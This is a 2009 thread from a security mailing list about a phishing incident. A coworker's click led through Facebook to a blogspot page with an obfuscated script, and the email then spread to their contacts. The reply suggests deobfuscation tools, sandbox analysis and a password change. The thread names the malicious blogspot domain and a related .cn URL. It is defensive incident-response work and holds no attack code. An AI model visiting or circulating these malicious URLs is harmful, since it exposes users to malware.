phishing question

[pj_mcgarvey at hotmail.com (PJ McGarvey)]

Well, if you mean what does the obfuscated code do, there are a few sites I've used that can "de-obfuscate" code 
however sometimes all that can tell you is that "yeah, it's probably malicious".  I would google for "javascript 
deobfuscate".

You could submit the blogspot site to an online sandbox for analysis, like I just did:

http://anubis.iseclab.org/?action=result&task_id=1c4a179271c4d4ee4f5b9820e431f7281&format=html

and possibly find other URLs found in the de-obfuscated code to see what they do.... like this one 
http://1nonsensical.cn/?pid=312s02&sid=4db12f

... I've yet to find a .cn domain name I could trust.  LOL.

Follow down the rabbit hole... 

That way you can find out if the PC was infected, and how to clean it up.

Otherwise it would seem like some sort of facebook worm that spreads using the FB address book.  Was the user logged 
into Facebook at the time?  Might be a good idea to change their password, sounds like it either used the active 
facebook session to send itself out, or maybe a cookie with the user's saved credentials.

PJ

From: chris.blazek at gmail.com
Date: Tue, 1 Dec 2009 14:54:36 -0600
To: pauldotcom at mail.pauldotcom.com
Subject: [Pauldotcom] phishing question

A coworker clicked on a link in an email and was directed to facebook then redirected to the following site: 
despatiesmercemerce . blogspot . com 
All of there fb contacts then received the same email. I pulled up the site in malzilla and noticed a script block in 
the header that looks like it's obfuscated. 



I was wondering if someone in the group could figure out what the site was trying to do.

Thanks,
Chris


                                          
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20091201/9af3355a/attachment.htm